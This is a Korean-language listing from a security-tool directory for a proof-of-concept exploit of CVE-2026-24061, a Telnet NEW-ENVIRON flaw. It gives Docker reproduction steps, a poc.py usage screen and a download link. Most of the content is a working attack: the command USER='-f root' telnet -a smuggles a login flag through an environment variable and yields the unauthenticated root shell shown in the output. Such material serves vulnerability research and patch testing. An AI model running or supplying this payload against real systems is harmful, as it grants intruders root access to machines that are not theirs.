Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061 — CVE-2026-24061에 대한 개념 증명 익스플로잇으로, Telnet NEW-ENVIRON 원격 코드 실행(RCE) 취약점이며, Docker 재현 환경과 Python 탐지 스크립트를 포함합니다. | Kitploit
도구/GitHubGitHub/r00tuser111/cve-2026-24061
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubr00tuser111/cve-2026-24061

CVE-2026-24061

CVE-2026-24061에 대한 개념 증명 익스플로잇으로, Telnet NEW-ENVIRON 원격 코드 실행(RCE) 취약점이며, Docker 재현 환경과 Python 탐지 스크립트를 포함합니다.

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061

재현 절차

이미지 빌드

root@kitploit:~
docker build -t telnetd-bypass .

컨테이너 시작

root@kitploit:~
docker run -it --rm \
  --name telnetd-vuln \
  --privileged \
  -p 23:23 \
  telnetd-bypass

payload 전송

root@kitploit:~
USER='-f root' telnet -a 127.0.0.1 23

결과

root@kitploit:~
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.10.14-linuxkit (c910afb30330) (pts/1)

Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#

재현 스크립트:

python3 poc.py -h

root@kitploit:~
usage: poc.py [-h] -t TARGET [-p PORT]

CVE-2026-24061 Telnet NEW-ENVIRON RCE 취약점 탐지 도구

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        대상 IP 주소
  -p PORT, --port PORT  대상 포트 (기본값: 23)

예시:
  poc.py -t 192.168.1.100 -p 23
  poc.py --target 127.0.0.1 --port 23

참고 링크:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA
도구 다운로드